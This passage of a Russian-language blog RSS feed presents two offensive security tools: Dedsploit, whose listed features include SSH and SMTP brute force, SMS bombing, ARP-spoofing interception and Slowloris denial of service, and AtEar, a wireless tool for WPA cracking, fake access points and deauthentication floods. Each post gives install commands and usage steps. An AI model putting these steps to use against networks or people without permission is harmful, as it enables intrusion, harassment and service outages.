  <p>При использовании такого списка вы сократите вероятность совершения ошибки. Не будьте самоуверенны. Можно 100 раз делать всё правильно, а потом ошибиться и всё пойдет прахом.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@krakenteam/Sk_GmKWMU</guid><link>https://teletype.in/@krakenteam/Sk_GmKWMU?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/Sk_GmKWMU?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>Dedsploit Framework</title><pubDate>Fri, 31 Jan 2020 10:36:00 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/89/d2/89d2878e-2a52-4eca-a7e8-54c535f6f3f7.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/64/dc/64dcc53c-f1cd-4eed-a835-0ee43a2ee9f6.png"></img>KRAKENteam]]></description><content:encoded><![CDATA[
  <p>KRAKENteam</p>
  <p>Приветствую всех. В этой статье речь пойдет о фреймворке для тестирования на проникновение под названием <strong>Dedsploit</strong></p>
  <figure class="m_column">
    <img src="https://teletype.in/files/64/dc/64dcc53c-f1cd-4eed-a835-0ee43a2ee9f6.png" width="623" />
  </figure>
  <p><strong>Dedsploit</strong>– предназначается для атак по SSH, SMTP и HTTP. Авторы говорят, что данный фреймворк поможет осуществлять такие атаки очень просто и не прибегая к сложностям.</p>
  <p><strong>Зависимости</strong>:</p>
  <p>· Nmap</p>
  <p>· Python 2.7.x</p>
  <p><strong>Основные особенности:</strong></p>
  <p>· SSH; брутфорс уязвимого сервера SSH.</p>
  <p>· SMTP; брутфорс SMTP-адреса.</p>
  <p>· SMSBomb - использует SMTP, электронную почту как шлюз спам SMS-сообщений.</p>
  <p>· HTTP; Arpspoof - MITM, где пользователь фальсифицирует сообщения ARP по локальной сети, перехватывает пакеты от хоста</p>
  <p>· Slowloris - Layer-7 DoS атака с использованием медленных заголовков и неправильно сформированных запросов GET на уязвимый веб-сервер.</p>
  <p>· pscan - сканирование портов с Nmap</p>
  <p>· hosts - поиск активных хостов</p>
  <p>Установка и использование:</p>
  <p>Выполняем в терминале следующие команды:</p>
  <p>&gt;<strong>git clone <a href="https://github.com/ex0dus-0x/dedsploit" target="_blank">https://github.com/ex0dus-0x/dedsploit</a></strong></p>
  <p>&gt;<strong>chmod a+x installer.py</strong></p>
  <p>&gt;<strong>chmod a+x dedsploit.py</strong></p>
  <figure class="m_column">
    <img src="https://teletype.in/files/c4/65/c465dd8c-86c2-40de-a9ff-94a2ed34f19e.png" width="623" />
  </figure>
  <p>Дальнейшие действия необходимо производить от обычного пользователя, который входит в группу sudo.</p>
  <p><strong><br />&gt; sudo python installer.py</strong></p>
  <figure class="m_column">
    <img src="https://teletype.in/files/fc/11/fc1192f4-af44-45d0-be8c-2ad5742bdd47.png" width="623" />
  </figure>
  <p>Выбираем свою операционную систему и дожидаемся окончания установки:</p>
  <figure class="m_column">
    <img src="https://teletype.in/files/89/d2/89d2878e-2a52-4eca-a7e8-54c535f6f3f7.png" width="623" />
  </figure>
  <p>Так же от имени пользователя запускаем фреймворк:</p>
  <p>&gt;<strong>sudo python dedsploit.py</strong></p>
  <figure class="m_column">
    <img src="https://teletype.in/files/8c/a7/8ca739f5-c729-42f6-9981-48a77fe2def9.png" width="623" />
  </figure>
  <p><strong>&gt; help </strong>(посмотреть список доступных модулей)</p>
  <p>Страница проекта на Github<strong> - <a href="https://github.com/ex0dus-0x/dedsploit" target="_blank">https://github.com/ex0dus-0x/dedsploit</a></strong></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@krakenteam/ByDb_7kGL</guid><link>https://teletype.in/@krakenteam/ByDb_7kGL?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam</link><comments>https://teletype.in/@krakenteam/ByDb_7kGL?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=krakenteam#comments</comments><dc:creator>krakenteam</dc:creator><title>AtEar - эффективная система для оценки уязвимостей беспроводных сетей.</title><pubDate>Wed, 29 Jan 2020 15:42:55 GMT</pubDate><media:content medium="image" url="https://codeby.net/attachments/20170119113533063_027_re-jpg.20142/"></media:content><description><![CDATA[<img src="https://codeby.net/attachments/20170119113533063_027_re-jpg.20142/"></img>KRAKENteam]]></description><content:encoded><![CDATA[
  <p>KRAKENteam</p>
  <p>Всем привет. Представляю вашему вниманию эффективную систему для оценки уязвимостей беспроводных сетей.</p>
  <p>Разработчик -===<a href="https://github.com/NORMA-Inc/AtEar" target="_blank">NORMA-Inc/AtEar</a></p>
  <p>Имеется веб-интерфейс.</p>
  <p><strong>Введение</strong>.</p>
  <p>AtEar - система с веб-интерфейсом, <strong>предназначенная </strong>для оценки уязвимостей беспроводных сетей.</p>
  <figure class="m_column">
    <img src="https://codeby.net/attachments/20170119113533063_027_re-jpg.20142/" width="600" />
  </figure>
  <p><strong>Функционал</strong></p>
  <ol>
    <li>Сканирование беспроводных сетей. (Банальная основа.)</li>
    <li>Графики с данными о беспроводных сетях (Канал, Шифрование, Тип).</li>
    <li>Беспроводной пентестинг (WEP, WPA1, WPA2).</li>
    <li>Получение сетевой информации (IP, Информация о подключённых хостах).</li>
    <li>Fake AP (фальшивая точка доступа).</li>
  </ol>
  <p><strong>WIDS (Wireless intrusion detection system — Система обнаружения беспроводных вторжений)</strong></p>
  <ol>
    <li>Флуд для рассоединения.</li>
    <li>Флуд для деаутентификации.</li>
    <li>Атака WESSID-NG.</li>
    <li>Атака Koreck Chopchop.</li>
    <li>Атака Fragmentation PGRA.</li>
    <li>Атака MDK MICHEAL SHUTDOWN Exploitation TKIP.</li>
    <li>Атака TKIPUN-NG.</li>
    <li>DOS Атака.</li>
    <li>Флуд.</li>
    <li>Большое количество отправляемых сообщений.</li>
    <li>(Rogue AP).</li>
    <li>(Beacon Flood).</li>
  </ol>
  <p><strong>Брутфорс службы</strong></p>
  <ol>
    <li>Брут-форс FTP.</li>
    <li>Брут-форс SSH.</li>
    <li>Брут-форс Telnet.</li>
    <li>Брут-форс SMTP.</li>
    <li>Брут-форс POP.</li>
    <li>Брут-форс IMAP.</li>
    <li>Брут-форс LDAP.</li>
    <li>Брут-форс SMB.</li>
    <li>Брут-форс rlogin.</li>
    <li>Брут-форс MSSQL.</li>
    <li>Брут-форс MYSQL.</li>
    <li>Брут-форс PGSQL.</li>
    <li>Брут-форс VNC.</li>
    <li>Брут-форс SNMP.</li>
  </ol>
  <p><strong>Зависимости:</strong></p>
  <ol>
    <li>aircrack-ng.</li>
    <li>tshark.</li>
    <li>hostapd.</li>
    <li>python-dev.</li>
    <li>python-flask.</li>
    <li>python-paramiko.</li>
    <li>python-psycopg2.</li>
    <li>python-pyodbc.</li>
    <li>python-sqlite.</li>
    <li>python-pip.</li>
  </ol>
  <p>Код:</p>
  <pre>Установка и запуск.
# git clone https://github.com/NORMA-Inc/AtEar.git
# cd ./AtEar/
# sudo bash install.sh
Пример запуска - python run.py --iface wlan0
Если увидим: Start AtEar-Beta....
Changing Monitoring mode...
То все работает.
Переходим по http://0.0.0.0:8080/
Нажимаем Go. Переходим в категорию &quot;Wireless Scan&quot;. Далее нажимаем &quot;Start&quot;.
И увидим точки доступа Wifi.</pre>
  <p>Если хотим проверить точку доступа. После заходим в категорию &quot;Pentest&quot; ---- &quot;Ap select&quot; --- выбираем точку доступа ---- next. Далее в категорию &quot;Pentest Options&quot;. Настраиваем для брута. В &quot;<strong>Keycracking Option</strong>&quot; выбираем <strong>&quot;Dictionary</strong>&quot; -----<strong>&quot;Dictionary Options</strong>&quot; ------ отмечаем Password List -- next.</p>
  <figure class="m_column">
    <img src="https://codeby.net/attachments/screenshot-from-2018-07-13-13-25-40-png.20144/" width="1680" />
  </figure>
  <figure class="m_column">
    <img src="https://codeby.net/attachments/screenshot-from-2018-07-13-13-23-47-png.20143/" width="1680" />
  </figure>
  <figure class="m_column">
    <img src="https://codeby.net/attachments/screenshot-from-2018-07-13-13-23-57-png.20145/" width="1680" />
  </figure>
  <p><strong>Заключение</strong></p>
  <p>Используейте данный инструмент для защиты и проверки своей корпоративной сети , дабы не нарушить закон.</p>
  <figure class="m_column">
    <iframe src="https://www.youtube.com/embed/qkqEirRf88E?autoplay=0&loop=0&mute=0"></iframe>
  </figure>

]]></content:encoded></item></channel></rss>